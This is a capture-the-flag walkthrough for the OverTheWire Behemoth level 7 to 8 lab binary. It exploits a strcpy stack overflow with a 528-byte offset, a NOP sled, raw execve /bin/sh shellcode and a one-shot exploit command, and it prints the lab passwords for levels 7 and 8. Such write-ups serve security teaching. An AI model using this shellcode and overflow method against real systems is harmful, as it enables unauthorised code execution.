OverTheWire Behemoth Level 7 → 8 tutorial!!

Login

Log in as behemoth7 using the password you obtained from Level 6 → 7.

ssh behemoth7@behemoth.labs.overthewire.org -p 2221
# password: baquxouafo

Task

The binary /behemoth/behemoth7 zeroes out all environment variables, so the usual “ret2env shellcode” trick won’t work anymore. Instead, we must inject our own shellcode directly as program input, use a NOP sled, and overwrite EIP with a guessed return address that lands in the sled.

A little bit of Theory

• No env shellcode: Normally we put shellcode into $SHELLCODE env var, but here the binary clears them.
• Direct input injection: Our input buffer → payload (padding + shellcode).
• NOP sled: A large sequence of \x90 (no-op). Even if the return address guess is slightly wrong, CPU “slides” into the shellcode.
• Overflow mechanics: Overflow buffer (528 A’s) → overwrite EIP with address inside the sled.
• Little endian: Always reverse byte order for addresses (0xffffd7e0 → \xe0\xd7\xff\xff).

Further reading:

• Buffer overflow basics (Wikipedia)
• NOP sleds (Exploit-db)

Solution

1. Baseline test

   ./behemoth7
   # no output, just returns
   

   With argument:

   ./behemoth7 AAAA
   # still no output
   

   → Suspicious. Let’s ltrace it.

2. Trace with arguments

   ltrace ./behemoth7 AAAA
   

   You’ll see strcpy calls → vulnerable.

   All environment vars are cleared (memset), so we can’t use $SHELLCODE. We must inject shellcode directly.

3. Overflow test

   gdb -q ./behemoth7
   (gdb) run $(python -c "print 600 * 'A'")
   

   → Segfault at 0x41414141 ✅ we control EIP.

4. Find exact offset

   (gdb) run $(python -c "print 528 * 'A' + 'BBBB'")
   

   → EIP = 0x42424242 → offset confirmed: 528 bytes.

5. Build payload with NOP sled + shellcode

   python -c 'print "A"*528 + "BBBB" + "\x90"*200 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68" + "\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"'
   

   (classic /bin/sh shellcode)

6. Find a return address inside sled

   After running payload inside gdb, dump stack:

   x/500wx $esp
   

   You’ll see sled at e.g. 0xffffd7e0.

7. Exploit

   Use 0xffffd7e0 as RET:

   ./behemoth7 $(python -c "print 528 * 'A' + '\xe0\xd7\xff\xff' + '\x90'*200 + '\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80'")
   

   → Shell popped.

8. Grab password

   whoami
   # behemoth8
   cat /etc/behemoth_pass/behemoth8
   

   Result:

   pheewij7Ae
   

Password

pheewij7Ae

Troubleshooting

• Segfault but no shell → your RET missed the sled. Re-run gdb, pick an address inside the \x90 block.
• Wrong offset → ensure EIP becomes 0x42424242 with test payload.
• Non-alphanum restriction → some binaries block non-ASCII chars. Here it accepts raw bytes, so classic shellcode works.
• Environment cleared → don’t waste time with $SHELLCODE. Direct input only.

Copy-paste quick run (one shot)

ssh behemoth7@behemoth.labs.overthewire.org -p 2221
# password: baquxouafo

cd /behemoth

# Exploit with offset, RET and sled
./behemoth7 $(python -c "print 528 * 'A' + '\xe0\xd7\xff\xff' + '\x90'*200 + '\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80'")

whoami
cat /etc/behemoth_pass/behemoth8

Congrats 🎉 You bypassed the env wipe, injected shellcode directly with a NOP sled, and escalated to behemoth8!

Thanks for reading!

Until next time — Otsumachi!! 💖☄️✨